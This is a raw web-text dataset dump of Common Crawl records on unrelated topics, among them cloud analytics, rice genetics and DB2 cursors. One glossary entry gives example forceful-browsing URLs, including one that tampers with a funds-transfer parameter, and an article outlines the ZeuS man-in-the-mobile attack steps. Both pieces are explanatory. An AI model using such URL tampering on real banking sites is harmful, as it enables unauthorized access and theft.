text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Most people–especially in the West–know very little about the Middle East and the people that live there. This lack of knowledge hurts our ability to understand, and engage in intelligent discussion about, current events. For example, frighteningly few know the difference between Sunni and Shia Muslims, and most think the words “Arab” and “Muslim” are pretty much interchangeable. They aren’t. So here’s a very brief primer aimed at raising the level of knowledge about the region to an absolute minimum. Arabs are part of an ethnic group, not a religion. Arabs were around long before Islam, and there have been (and still are) Arab Christians and Arab Jews. In general, you’re an Arab if you 1) are of Arab descent (blood), or 2) speak the main Arab language (Arabic). Not all Arabs are Muslim. There are significant populations of Arab Christians throughout the world, including in Lebanon, Syria, Jordan, Northern Africa and Palestine/Israel. Islam is a religion. A Muslim (roughly pronounced MOOSE-lihm) is someone who follows the religion. So you wouldn’t say someone follows Muslim or is an Islam, just as you wouldn’t say someone follows Christian or is a Christianity. Shia Muslims are similar to Roman Catholics in Christianity. They have a strong clerical presence via Imams and promote the idea of going through them to practice the religion correctly. Sunni Muslims are more like Protestant Christians. They don’t really focus on Imams and believe in maintaining a more direct line to God than the Shia. Arabs are Semites. We’ve all heard the term anti-Semitism being used — often to describe Arabs. While antisemitism does specifically indicate hatred for Jews, the word “Semite” comes from the Bible and referred originally to anyone who spoke one of the Semitic Languages. According to the Bible, Jews and Arabs are related [Genesis 25]. Jews descended from Abraham‘s son Isaac, and Arabs descended from Abraham’s son Ishmael. So not only are both groups Semitic, but they’re also family. Sunni Muslims make up most of the Muslim world (roughly 90%). 1 The country with the world’s largest Muslim population is Indonesia. 2 The rift between the Shia and Sunni started right after Muhammad’s death and originally reduced to a power struggle regarding who was going to become the authoritative group for continuing the faith. The Shia believed Muhammad’s second cousin Ali should have taken over (the family/cleric model). The Sunni believed that the best person for the job should be chosen by the followers (the merit model) and that’s how the first Caliph, Abu Bakr, was appointed. Although the conflict began as a political struggle it now mostly considered a religious and class conflict, with political conflict emanating from those rifts. Sunni vs. Shia | Arab vs. Non-Arab Here’s how the various Middle Eastern countries break down in terms of Sunni vs. Shia and whether or not they are predominantly Arab. Keep in mind that these are generalizations; significant diversity exists in many of the countries listed. Iraq Mostly Shia (roughly 60%), but under Saddam the Shia were oppressed and the Sunni were in power despite being only 20% of the population. Arab. Iran Shia. NOT Arab. Palestine Sunni. Arab. Egypt Sunni. Arab. Saudi Arabia Sunni. Arab. Syria Sunni. Arab. Jordan Sunni. Arab. Gulf States Sunni. Arab.
<urn:uuid:dc1d9b26-91e0-4154-a3df-7dbf55d53d93>
CC-MAIN-2017-04
https://danielmiessler.com/blog/10-facts-every-westerner-should-know-about-the-middle-east/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00142-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939487
754
2.921875
3
Fiber optical module is characterized by three sets of performance criteria: transceiver, receiver, and transmitter. The transmitter converts electrical signals into light signals, through the fiber optical transmission, the receiving end of the optical signals are converted into electric signals. According to the optical module function, fiber optic transceivers can be divided into fiber optical receiver module, fiber optical transmission module, fiber optical transceiver module and fiber optical transponder module. Fiber optic transceiver module main function is to achieve the conversion between optical-electrical and electrical-optical, including optical power control, modulation transmission, signal detection, IV conversion and limiting amplifier decision regeneration, in addition, there are security information query, TX-disable and other functions. Common fiber optic transceiver modules are: SFP, SFF, SFP+, GBIC, XFP, 1×9 and so on. Fiber optical transmission module not only has photoelectric conversion function, but also it integrates a lot of signal processing functions, such as: MUX / DEMUX, CDR, function control, energy acquisition and monitoring. Common fiber optical transmission modules: 200/300pin, XENPAK, and X2/XPAK so on. The optical transceiver module, referred to as optical module or fiber optic module, is an important device in fiber optical communication system. According to the main parameters of fiber optical module Pluggable: hot pluggable and non-hot pluggable; Package: SFP, GBIC, XFP, Xenpak, X2, 1X9, SFF, 200/3000pin, XPAK Transmission Rate: Transmission rate refers to the number of gigabits transmitted per second, per unit of Mb/s or Gb/s. Optical modules cover the following main rate: low rates, Fast, Gigabit, 2.5G, 4.25G, 4.9G, 6G, 8G, 10G and 40G. According to the optical module package 1.XFP (10 Gigabit Small Form Factor Pluggable) is a hot pluggable transceiver, is independent communication protocol optical transceiver for 10G bps Ethernet, SONET / SDH and Fiber Channel. 2. SFP transceivers (small form factor pluggable), currently are the most widely used. 3.GigacBiDi series of single-mode bidirectional optical module, uses WDM technology, achieving a fiber optic transmits two-way information (point to point transmission, especially for fiber optic resources are insufficient, need a fiber bi-directional signal transmission). GigacBiDi series include SFP Bidirectional (BiDi), GBIC Bidirectional (BiDi), SFP+ Bidirectional (BiDi), XFP Bidirectional (BiDi), SFF Bidirectional (BiDi) and so on. 4.RJ45 transceiver is electrical port small form factor pluggable module, also known as the power module or electrical interface module. 5.SFF According to their pin, SFF transceivers are divided into 2×5, 2×10, etc. 6 Gigabit Ethernet Interface Converter (GBIC) module. 7 Passive Optical Network PON (A-PON, G-PON, EPON OLT) optical module. 8.40Gbs high-speed optical modules. 9.SDH transmission module (OC3, OC12, OC48). 10 Storage modules, such as 4G, 8G, etc.
<urn:uuid:a2f804da-047c-4b94-bb1b-9f680b416900>
CC-MAIN-2017-04
http://www.fs.com/blog/classifications-of-fiber-optic-modules.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00197-ip-10-171-10-70.ec2.internal.warc.gz
en
0.817749
746
2.734375
3
Liu J.,ShenYang Agricultural University | Liu J.,Collaborative Innovation Center for Genetic Improvement and Quality | Wang J.,ShenYang Agricultural University | Wang J.,Collaborative Innovation Center for Genetic Improvement and Quality | And 6 more authors. Plant Breeding | Year: 2015 Chlorophylls absorb and transfer light energy to the photosynthetic system. Consequently, chlorophyll content is strongly related to crop biomass and yield. We isolated a rice spontaneous mutant, lower chlorophyll b 1 (lcb1), from a recombinant inbred line population. Under normal growth conditions, lcb1 plants produced yellow leaves with decreased total chlorophyll and chlorophyll b contents, but normal chlorophyll a content. Photosynthetic and fluorescence parameters differed between wild-type and lcb1 plants. Compared with wild type, lcb1 had a higher electron transfer rate, a lower photochemical quenching coefficient and significantly reduced grain number, biomass and yield. A recessive nuclear gene controlled the mutant trait. Through map-based cloning, we located the LCB1 gene in a 117.4-kb region on the short arm of chromosome 3, close to the centromere, in a region containing 15 predicted candidate genes. None of these genes was directly related to chlorophylls or the chloroplast; therefore, lcb1 may be a mutation of a novel gene. These results will be useful for further research on the molecular mechanisms controlling biogenesis and chloroplast biochemical processes. © 2015 Blackwell Verlag GmbH. Source
<urn:uuid:c2652a92-8cf3-4c7c-ac88-a5ed2ba8bf13>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/collaborative-innovation-center-for-genetic-improvement-and-quality-1997954/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.842161
331
2.625
3
Most organizations build centralized and huge data centers to serve their needs. Take for instance, the facilities built by companies like Microsoft, Amazon and Google. All of them have come up near sources of cheapest possible power and other locational advantages. Big data centers certainly have few clear advantages.Having a few centralized facilities means economies of scale in purchases and operational expenditures. It also means simpler tax calculations and a better ability to support local economy with jobs and support businesses. Companies also will opt for going green if it makes sense, cost- wise. On the other side, a large data center can have a huge impact on the water sources and prove to be a single point of failure. Going against the established norm of big data centers are companies like AOL which has come up with a MDC or micro data center. The company can work with minimum power and establish operations very quickly almost anywhere. Being able to access the network’s edge is possible. But there are also the issues of management and distributed renewable power. Read More About Data Center
<urn:uuid:40b5b0f8-be7e-4e7a-936d-86d0102a2960>
CC-MAIN-2017-04
http://www.datacenterjournal.com/distributed-vs-centralized-data-center/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00281-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96629
209
3.125
3
Cost of Quality Cost of quality So, you want to find lots of bugs, especially critical bugs, and also do so much more cheaply than the alternative: customers and users finding bugs in production. To measure this, use a technique called cost of quality to identify three main costs associated with testing and quality. 1. Cost of detection: the testing costs which you would incur even if you found no bugs. For example, setting up the test environment and creating test data are activities that incur costs of detection. 2. Cost of internal failure: the testing and development costs which you incur purely because you find bugs in prerelease testing. For example, filing bug reports and fixing bugs are activities that incur costs of internal failure. 3. Cost of external failure: the support, testing, development and other costs which you incur because you release systems with some number of bugs (just like everyone else). For example, much of the costs for technical support or help desk organizations and sustaining engineering teams are costs of external failure. Calculate the average costs of a bug in testing and in production, as explained below: 1. The average cost of a test bug (ACTB) = the cost of detection + cost of internal failure divided by the number of test bugs. 2. The average cost of a production bug (ACPB) = the cost of external failure divided by the number of production bugs. As I mentioned in a previous Knowledge Center article, the average cost of a bug found during prerelease testing is well below the average cost of a production bug-often by a factor of two, five, ten or more. The bigger the difference, the more optimized your quality assurance efforts are from a financial point of view. In addition, the more expensive it is for your organization to deal with bugs in production, the more it should invest in prerelease testing. As you've seen in this article, quality need not be an elusive, subjective, unmanageable element in your projects. You can define quality objectives, derive important questions related to these objectives, devise metrics, set quality goals and measure quality progress. Organizations of all sizes-from small startups to large global enterprises-have already taken these steps toward quantitative quality management. You, too, can go beyond gut feel and rabbit's feet to set-and achieve-quality goals for your IT projects. Rex Black is President of RBCS. Rex is also the immediate past president of the International Software Testing Qualifications Board and the American Software Testing Qualifications Board. Rex has published six books, which have sold over 50,000 copies, including Japanese, Chinese, Indian, Hebrew and Russian editions. Rex has written over thirty articles, presented hundreds of papers, workshops and seminars, and given over fifty speeches at conferences and events around the world. Rex may be reached at email@example.com.
<urn:uuid:d5a55725-eea2-4418-9686-91407959a43b>
CC-MAIN-2017-04
http://www.eweek.com/c/a/IT-Management/How-to-Set-Quality-Goals-for-Your-IT-Projects/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00189-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948744
588
2.65625
3
Henry C.,Montpellier SupAgro | Raivoarisoa J.-F.,Ambatovy | Razafimamonjy A.,Ambatovy | Ramanankierana H.,Center National Of Recherches Sur Lenvironnement | And 3 more authors. Forest Ecology and Management | Year: 2015 Ecological restoration in severely disturbed environments can fail because of lack of knowledge of the functioning of the original ecosystem. Nevertheless, facilitating establishment between plant species can help accelerate ecological succession, especially in stressful environments. Mycorrhizal symbiosis plays a key role in plant growth, particularly in harsh environments, and could also play a role in facilitation between plants, as mycorrhizal fungi can form a mycelial network that simultaneously interacts with the root systems of several plant species. In a high-elevation Malagasy tropical rainforest on acidic and iron-rich soil surrounding an active mining site, four genera of ectomycorrhizal plants are locally abundant: Leptolaena, Sarcolaena, Uapaca and Asteropeia. A floristic survey showed that only Asteropeia seedlings can grow on bare soil. Molecular analysis of ectomycorrhizal fungi ITS rDNA enabled us to describe ectomycorrhizal communities and their distribution among these four plant genera. Russulaceae, Boletales, Cortinariaceae and Thelephoraceae are abundant in these forests. There is extensive sharing between ectomycorrhizal communities associated with Asteropeia mcphersonii and other ectomycorrhizal plants. There are also many mycorrhizal fungi species which are common to ectomycorrhizal communities of seedlings and adult trees. This abundance of generalist fungi allows us to envisage the use of A. mcphersonii in the ecological restoration of the mine site. Planting ectomycorrhizal fungi in the bare soil at the beginning of ecological restoration could allow them to grow, thereby establishing a source of inoculum to colonize other ectomycorrhizal plants and consequently facilitate their establishment. © 2015 Published by Elsevier B.V. Source
<urn:uuid:b2a0579c-01b0-4e09-aaf5-b97d8906312d>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/ambatovy-1154750/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00097-ip-10-171-10-70.ec2.internal.warc.gz
en
0.871289
458
3.078125
3
0.10 Data Compression Algorithms The goal of data compression is to represent a some set of information as space efficiently as possible. A data compression code is a mapping between some set of source messages and a set of codewords. A source message does not have to be and is not usually an entire string being compressed. Rather, it is the set of symbols or strings into which the data being compressed is partitioned for processing. These basic units may be single symbols from the source string's alphabet, or they may be strings of such symbols. The process of converting from a source stream into a coded (hopefully compressed) message is called encoding while the inverse operation is called decoding. A lossless encoding method is one in which the process of decompression results in no loss of original data whereas lossy encoding method is one in which the original data cannot be fully recovered. Codes can be of the types block-block or variable-variable. Codes of the block-block variety operate on static, fixed-length codewords and source messages while their counterparts operate on dynamic length codewords and source messages. One example of a block-block type code is the ASCII code. It is of the block-block variety because it maps fixed-length source messages (characters) into fixed-length codewords (their ASCII Because variable-variable type codes produce codewords that do not have a fixed length, when processing the output of a variable-variable code it is vital to be able to differentiate between codewords in the stream. Fixed length codewords are easy to distinguish due to their regular spacing pattern. However, we do not have this luxury when dealing with variable-variable codes. The sequence of codewords or source messages in a stream is called an ensemble. A coding function is called distinct if its mapping from source messages to codewords is one-to-one. Such a code is called uniquely decodable if every codeword is recognizable even when immersed in a stream of other codewords. A uniquely decodable code is known as a prefix code if it has the property that no codeword in the code is a prefix of any other codeword. Data compression schemes are said to be either static or dynamic (or adaptive). A static function is one in which the mapping from the input source messages to the set of codewords is fixed before the data compression begins. In such a system a given message is always represented by the same codeword regardless of where it appears in the ensemble. In contrast, a dynamic (or adaptive) algorithm may change the mapping for a particular source message during the compression process.
<urn:uuid:600df1c0-7b30-4258-8b2e-25d54e68e131>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/alg/node163.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00033-ip-10-171-10-70.ec2.internal.warc.gz
en
0.898409
592
4.3125
4
Clustered computing for real-time Big Data analytics The concept of parallel processing based on a “clustered” multi-computer architecture has a long history dating back at least as far as Gene Amdahl’s work at IBM in the 1960s. But the current epoch of distributed computing is often traced to December of 2004, when Google researchers Jeffrey Dean and Sanjay Ghemawat presented a paper unveiling MapReduce. Developed as a model for “processing and generating large data sets,” MapReduce was built around the core idea of using a map function to process a key/value pair into a set of intermediate key/value pairs, and then a reduce function to merge all intermediate values associated with a given intermediate key. Dean and Ghemawat’s work generated instant buzz and led to the introduction of an open source implementation, Hadoop, in 2006. As the first efficient distributed-computing platform for large datasets that was accessible to the masses, Hadoop’s initial hoopla was well deserved. It has since gone on to become a key technology for running many web-scale services and products, and has also landed in traditional enterprise and government IT organizations for solving big data problems in finance, demographics, intelligence, and more. Hadoop and its components are built around several key functionalities. One is the HDFS filesystem, which allows large datasets to be distributed over many nodes. Another is the algorithms that “map” (split) a workload over the nodes, such that each is operating on its local piece of the dataset, and “reduce” to aggregate the results from each piece. Hadoop also provides redundancy and fault tolerance mechanisms across the nodes. The key innovation is that each node operates on locally stored data, eliminating the network bottleneck that constrained traditional high-performance computing clusters. The limits of Hadoop Hadoop is great for batch processing large source datasets into result sets when your questions are well defined and you know ahead of time how you will use the data. But what if you need fast answers to questions that can’t be completely defined in advance? That’s a situation that’s become increasingly common for data-driven businesses, which need to make critical, time-sensitive decisions informed by large datasets of metrics from their customers, operations, or infrastructure. Often the answer to an initial inquiry leads to additional questions in an iterative cycle of question » answer » refine until the key insight is finally revealed. The problem for Hadoop users is that the Hadoop architecture doesn’t lend itself to interactive, low latency, ad-hoc queries. So the iterative “rinse and repeat” process required to yield useful insights can take hours to days. That’s not acceptable in use cases such as troubleshooting or security, where every minute of query latency means prolonged downtime or poor user experience, either of which can directly impact revenue or productivity. One approach that’s been tried to address this issue is to use Hadoop to pre-calculate a series of result sets that support different classes of questions. This involves pre-selecting various combinations of dimensions/columns from the source data, and collapsing that data into multiple result sets that contain only those dimensions. Known as “multidimensional online analytical processing” (M-OLAP), this approach is sometimes referred to more succinctly as “data cubes.” Relatively fast queries can be asked of the result sets, and the resulting performance is certainly leaps and bounds better than anything available before the advent of big data. While the use of data cubes boosts Hadoop’s utility, it still involves compromise. If the source data contains many dimensions, it’s not feasible to generate and retain result sets for all of the possible combinations. The result sets also need to be continually regenerated to incorporate new source data. And the lag between events and data availability can make it difficult to answer real-time questions. So even with data cubes, Hadoop’s value in time-dependent applications is inherently constrained. Big Data in real time Among the organizations that ran up against Hadoop’s real-time limitations was Google itself. So in 2010 Google one-upped Hadoop, publishing a white paper titled “Dremel: Interactive Analysis of Web-Scale Datasets.” Subsequently exposed as the BigQuery service within Google Cloud, Dremel is an alternative big data technology explicitly designed for blazingly fast ad hoc queries. Among Dremel’s innovations are a columnar data layout and protocol buffers for efficient data storage and super-fast full table scans, along with a tree architecture for dispatching queries and collecting results across clusters containing hundreds or thousands of nodes. It also enables querying using ANSI SQL syntax, the “lingua franca” of analysts everywhere. Dremel’s results are truly impressive. It can execute full scan queries over billions of rows in seconds to tens-of-seconds — regardless of the dimensionality (number of columns) or cardinality (uniqueness of values within a column) — even when those queries contain complex conditions like regex matches. And since the queries operate directly on the source data, there is no data availability lag; the most recently appended data is available for every query. Because massively parallel disk I/O is a key prerequisite for this level of performance, a significant hardware footprint is required, with a price tag higher than many organizations would be willing to spend. But when offered as a multi-tenant SaaS, the cost-per-customer becomes quite compelling, while still providing the performance of the entire cluster for any given query. Post-Hadoop NetFlow analytics Dremel proved that it was possible to create a real-world solution enabling ad hoc querying at massive scale. That’s a game-changer for real-time applications such as network analytics. Flow records — NetFlow, sFlow, IPFIX, etc. — on a decent-sized network add up fast, and Hadoop-based systems for storing and querying those records haven’t been able to provide a detailed, real-time picture of network activity. Here at Kentik, however, we’ve drawn on many of the same concepts employed in Dremel to build our microservice-based platform for flow-based traffic analysis. Called Kentik Detect, this solution enables us to offer customers an analytical engine that’s not only powerful and cost-effective but also maintains real-time performance across web-scale datasets, a feat that is out of reach for systems built around Hadoop. (For more on how we make it work, see Inside the Kentik Data Engine.) The practical benefit of Kentik’s post-Hadoop approach is to enable network operators to perform — in real-time — a full range of iterative analytical tasks that previously took too long to be of value. You can see aggregate traffic volume across a multi-terabit network and then drill down to individual IPs and conversations. You can filter and segment your network traffic by any combination of dimensions on-the-fly. And you can alert on needle-in-the-haystack events within millions of flows per second. Kentik Detect helps network operators to uncover anomalies, plan for the future, and better understand both their networks and their business. Request a demo, or experience Kentik Detect’s performance for yourself by starting a free trial today.
<urn:uuid:8e5e334a-bee2-44e4-984c-362eca1cbbcd>
CC-MAIN-2017-04
https://www.kentik.com/beyond-hadoop/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00151-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929052
1,580
2.71875
3
A growing population and expanding global activities continue to put Earth’s resources under pressure, and today many businesses face social, economic, and legislative pressures to make our future not only better, but greener. The Internet of Things (IoT) is bridging the physical and digital worlds, with new solutions that bring significant environmental benefits for people, businesses, and the planet. With 50 to 200 billion connected IoT devices being deployed by 2020, IoT is one thing that can positively contribute to the environment starting today. Companies like Taxibot, developer of the first robotic airplane towing vehicle; AugustaWestland, creator of an award-winning all-electric aircraft; and Schneider Electric, developer of an intelligent energy management system, are all making an impact by creating innovative products that address various environmental concerns—from increased emissions and global warming to the gradual depletion of energy sources. What you will learn: - Ways IoT can improve how we manage the Earth’s resources - How companies are making a positive impact on our environment today - How Wind River’s VxWorks is playing a role in helping create a greener Earth © Copyright 2017 INXPO, Inc. All rights reserved.
<urn:uuid:8572114f-3b7a-433d-9c41-a518402608b1>
CC-MAIN-2017-04
https://vts.inxpo.com/scripts/Server.nxp?LASCmd=AI:4;F:QS!10100&ShowKey=32882&AffiliateData=windriver
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00271-ip-10-171-10-70.ec2.internal.warc.gz
en
0.897186
246
2.765625
3
Using forceful browsing, attackers may gain access to restricted parts in the Web server directory. This kind of attack occurs when the attacker "forces" a URL by accessesing it directly instead of following links. The basic role of Web servers is to serve files. To prevent users from accessing unauthorized files on the Web server, Web servers provide two main security mechanisms: the root directory and access controls lists. The root directory limits users' access to a specific directory within the Web server's file system. All files placed in the root directory and its sub-directories are accessible to users. Using access control lists, administrators can determine whether a file can be viewed or executed by users, as well as other access rights. For example, consider a registration page that includes an HTML comment mentioning a file named _private/customer.txt. The file customer.txt was supposed to be an unreferenced file. However, by typing http://www.acme-hackme.com/_private/customer.txt, an attacker can retrieve the customer.txt file and view its contents. Other good examples are backup and temporary files. Appending "~", ".bak" or ".old" to HTML or CGI names may retrieve an older version of the source code. This is dangerous as many developers embed material into development code that they later remove. For example, www.xxx.com/cgi-bin/admin.jsp~ returns the admin.jsp source code. Attackers use forceful browsing to retrieve pages or perform operations that would otherwise require authentication. Assume Bob wants to transfer $100 to John. Bob logs in to his bank account, and clicks on fundsxfer.asp. He then types in the account names and amount, and xfer.asp with the transaction details, i.e. Xfer.asp validates the input (the "from" parameter is an authenticated user and the "sum" parameter reflects existing amount of money) and automatically redirects the browser to: dofundxfer.asp?from=bob&to=john&sum=100. By accessing dofundxfer.asp directly, Bob can bypass the user verification and transfer money from John to himself by typing Forceful browsing is usually combined with Brute Force techniques to gather information by attempting to access as many URLs as possible to enumerate directories and files on a server. Attackers may check for all variations of commonly existing files. For example, a password file search would encompass files including psswd.txt, password.htm, password.dat, and other variations.
<urn:uuid:8ed3a3b7-e562-4297-a323-0ca4f85bfdbf>
CC-MAIN-2017-04
https://www.imperva.com/Resources/Glossary?term=forceful_browsing
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00179-ip-10-171-10-70.ec2.internal.warc.gz
en
0.869944
547
3.359375
3
Data federation is run-time technology that makes it easy for an application to access a heterogeneous set of data stores. In this case, the data federator deals with all the different API's, the different database languages, it will try to optimize access to those data stores by doing distributed join optimization, and it will handle all the issues of distributed transactions. In my book on data virtualization (Data Virtualization for Business Intelligence Systems), I define data federation as follows: Data federation is an aspect of data virtualization where the data stored in a heterogeneous set of autonomous data stores is made accessible to data consumers as one integrated data store by using on-demand data integration. Data virtualization is much more than data federation. Here are some of the features supported by data virtualization servers today: - Self-service, iterative, and collaborative development - (Canonical) data modeling - On-demand data profiling and data cleansing - Full support for the entire development life cycle: business glossary, information modeling - Extensive data integrity features - Extensive master data management features - Integration of different data integration styles, including ETL, ELT, and replication If you want to know more about this topic, attend my session at the The Data Virtualization Experts Forum. Posted September 21, 2012 1:41 AM Permalink | No Comments |
<urn:uuid:9147ce48-9a9d-4bfd-ab30-5e6ce758a8fa>
CC-MAIN-2017-04
http://www.b-eye-network.com/blogs/vanderlans/archives/2012/09/data_virtualiza_2.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00417-ip-10-171-10-70.ec2.internal.warc.gz
en
0.876941
284
2.640625
3
Keeping hacker cyber-nastiness away from manned or unmanned ground vehicles is the idea behind a 4.5-year, $6 million grant from the Defense Advanced Research Projects Agency (DARPA) to Carnegie Mellon University. The project is part of DARPA's High-Assurance Cyber Military System (HACMS) program launched last year to produce ultra secure software systems to protect important networked assetsfrom hacks, attacks or other cyber-disruptions. From DARPA: "Embedded systems form a ubiquitous, networked, computing substrate that underlies much of modern technological society. Such systems range from large supervisory control and data acquisition (SCADA) systems that manage physical infrastructure to medical devices such as pacemakers and insulin pumps, to computer peripherals such as printers and routers, to communication devices such as cell phones and radios, to vehicles, airplanes and satellites. Such devices have been networked for a variety of reasons, including the ability to conveniently access diagnostic information, perform software updates, provide innovative features, lower costs, and improve ease of use. Researchers and hackers have shown that these kinds of networked systems are vulnerable to remote attack, and such attacks can cause physical damage while hiding the effects from monitors." Key technologies expected to be developed under the program include semi-automated software synthesis systems, verification tools such as theorem provers and model checkers, and specification languages, DARPA stated. The program aims to produce a set of publicly available tools integrated into a high-assurance software workbench, widely distributed to both defense and commercial sectors. In the defense arena, HACMS plans to enable high-assurance military systems ranging from unmanned ground, air and underwater vehicles, to weapons systems, satellites, and command and control devices. "This is an extremely challenging project as we work to develop secure robotic systems that are resilient to cyber-attacks," said Franz Franchetti, an associate research professor in Carnegie's Department of Electrical and Computer Engineering who received the grant. Franchetti said he is leading a team of researchers developing verification tools, including virtual high-assurance sensors and automatic software systems, to help computers figure out that they are under attack and to help them survive and continue operating. The research also will "lay the groundwork for problem-solving involving the disruption of GPS service to critical consumer systems like other ground vehicles and high-end cars that feature a variety of computer systems to assist drivers," Franchetti said. Check out these other hot stories:
<urn:uuid:55629141-6be4-428a-b964-d45ac8183bac>
CC-MAIN-2017-04
http://www.networkworld.com/article/2224193/malware-cybercrime/carnegie-mellon-gets--6m-for-security-software-to-protect-vehicles-from-hackers.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00353-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936221
512
2.625
3
The world is going mobile. The ability to offer banking services, including the ability to make purchases, via mobile devices is increasingly becoming a competitive requirement for financial institutions. According to a 2009 report by analyst firm Informa Telecoms and Media, the number of mobile banking transactions will grow to more than 300 billion by 2013 with an estimated value of $860 billion. Research also estimates the number of mobile users conducting regular banking on their devices will rise to an astonishing 977 million by 2013. As user acceptance of mobile banking becomes more mainstream, attacks against this communication channel will increase. Just as PC malware is now widespread, smart phone users will also be susceptible to drive-by downloads and phishing attacks from SMS messages with attachments. Although this type of attack is not yet a reality, it's only a matter of time it is. In fact, a PC version of the Zeus Trojan exists today that allows fraudsters to trick users into installing code on their handset that can intercept and forward certain voice calls (i.e., those from a bank) to phone numbers they control. Zeus is one of the most popular malware programs that specifically targets financial institutions in order to harvest sensitive information, including user names and passwords, from their customers in order to commit fraud. This Trojan infects PCs, waits for users to log onto their banking online application and then steals their credentials. The information is then sent to a remote server in real-time. The Trojan can also create its own HTML content, tricking users to divulge even more personal information -- such as their social security number or PIN. According to our estimates, ZeuS has infected between 0.5% and 1% of all PCs in the western world. As recently as December 2010, a major ZeuS attack left millions of Facebook users susceptible to identity theft. With banks liable for most consumer fraud losses under regulation E, the need for new methods to thwart these cyber thefts is urgent. One such initiative is to use mobile devices to authenticate online transactions. In theory, mobile handsets can be used not just to send SMS messages to authenticate individual transactions, but also to contact customers if there is suspected fraudulent activity on their account. However, even before its launch, this approach could be defeated. The Man-in-the-Mobile (MitMo) Attack Hackers behind the ZeuS Trojan have modified its attack code to stage remote take-overs of smartphones, which in turn allows them to launch a man-in-the-mobile (MitMo) attack. Here's how it is done: Step 1: ZeuS first infects the user's PC and steals the user's online banking credentials. It then mimics a message from the bank requesting the user to supply their mobile telephone number, make and model to 'set up' the authentication method. Step 2: The attacker then sends an SMS message to the user's mobile device asking them to download a new digital certificate to complete the process. Step 3: The user follows the link and downloads the 'digital certificate.' Step 4: The 'digital certificate' is actually a smartphone applet that creates a backdoor into the handset that, when triggered, instructs the handset to not display a given text message (i.e., the authentication code from the bank) on the phone's screen, but instead forward it to the hacker's own mobile device or computer across the Internet. Step 5: The elements necessary to carry out a MitMo attack are now in place. The difference between MitMo and a 'conventional' Man-in-the-Browser attack routine is that hackers effectively control the browser session AND the users' smartphone giving them 'authenticated' access to online banking sessions. Step 6: The hacker then initiates a banking transaction. Step 7: The bank sends a SMS to the mobile device linked to that account to authenticate the transaction. However, this SMS is intercepted and remotely streamed to a device controlled by the attacker. Step 8: The attacker provides authentication and the bank completes the transaction. The user is completely unaware of what has just taken place until they next check their bank balance or receive a statement. Much has been made of the "Walled Garden" approach used by the iPhone and other mobile platforms, which are designed to provide users with only "approved" applications and theoretically stem the threat of mobile attacks. But the "walled" approach is not foolproof. Some users, becoming frustrated with this approach, purposely unlock their devices to install unlicensed applications. Once the device is unlocked, security crumbles, making it just as vulnerable to malicious software as "un-walled" devices. Users are never 100 percent protected from attack, "Walled Garden" or not. What can be done? As the scenario above illustrates, two-factor authentication doesn't protect against all threats, such as ZeuS MitMo and MitB attacks. These attacks allow cyber criminals to hijack online banking sessions and render many multi-factor and strong authentication measures meaningless. To ensure that criminals aren't able commandeer the mobile platform before it even has the chance to get off the ground, banks should consider: 1. New methods for securing browser communications with their customers on both PC and mobile handset platforms 2. Providing end-user education on safe online practices 3. Implementing tough authentication standards Amit Klein is a malware researcher and CTO of secure browsing service provider Trusteer.
<urn:uuid:a5da6eee-a91f-4fa8-863e-2ff3aef53a8b>
CC-MAIN-2017-04
http://www.banktech.com/how-to-stem-the-tide-of-mobile-attacks/a/d-id/1294473
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00474-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932188
1,115
2.578125
3
in a cursor program when will the execution happens for the sql statement,because if i am updating a row in a fetch step and then if it is displayed in the next line i will not get the updated value.After closing that cursor and again if it is opened and displayed i l get the updated value so when the updatio is happening? Joined: 13 Jun 2007 Posts: 632 Location: Wisconsin Here is an excellent excellent article describing the history of cursors in DB2. It describes how sometimes you are working not directly with the database, but a materialized result set. So your cursor may or may not read directly from the table depending on how the optimizer decided to execute it.
<urn:uuid:347c0285-3c2f-4456-b76f-dbf42531a9c0>
CC-MAIN-2017-04
http://ibmmainframes.com/about22697.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00106-ip-10-171-10-70.ec2.internal.warc.gz
en
0.832587
142
2.765625
3
